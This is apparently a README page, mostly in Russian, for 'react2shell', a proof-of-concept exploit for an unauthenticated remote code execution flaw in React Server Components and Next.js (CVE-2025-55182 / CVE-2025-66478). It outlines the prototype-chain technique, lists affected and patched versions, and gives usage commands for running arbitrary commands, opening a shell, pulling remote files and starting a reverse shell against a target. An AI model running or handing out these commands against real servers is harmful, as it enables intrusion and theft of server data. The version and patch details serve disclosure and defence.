
react2shell - CVE-2025-55182 (Next.js: CVE-2025-66478) - Unauthenticated RCE in React Server Components (Flight Protocol) - PoC Exploit

CVE-2025-55182 (Next.js: CVE-2025-66478)
Неавторизованный RCE в React Server Components (Flight Protocol) — PoC эксплойт
React Server Components (Flight protocol) десериализуют управляемые атакующим multipart/form-data без проверки доступа к цепочке прототипов. Один неавторизованный POST-запрос с заголовком Next-Action достигает конструктора Function через искусно составленную ссылочную цепочку ($1:__proto__:then + $1:constructor:constructor), что приводит к удалённому выполнению кода на сервере.
Затрагивает react-server-dom-{webpack,turbopack,parcel} 19.0.0 – 19.2.0 и потребителей (downstream), включая Next.js App Router (14.3.0-canary.77+, 15.x, 16.x). Проекты, созданные по умолчанию через create-next-app, уязвимы.
git clone https://github.com/rvzsec/react2shell
cd react2shell
pip3 install -r requirements.txt
python3 react2shell.py check -t <target>
python3 react2shell.py exec -t <target> -c '<command>'
python3 react2shell.py shell -t <target>
python3 react2shell.py file -t <target> -f <remote-path> -o <local-out>
python3 react2shell.py revshell -t <target> --lhost <ip> --lport <port>
React 19.0.1 / 19.1.2 / 19.2.1+ — Next.js 15.0.5 / 15.1.9 / 15.2.6 / 15.3.6 / 15.4.8 / 15.5.7 / 16.0.7
Первоначальное раскрытие: Lachlan Davidson (@lachlan2k)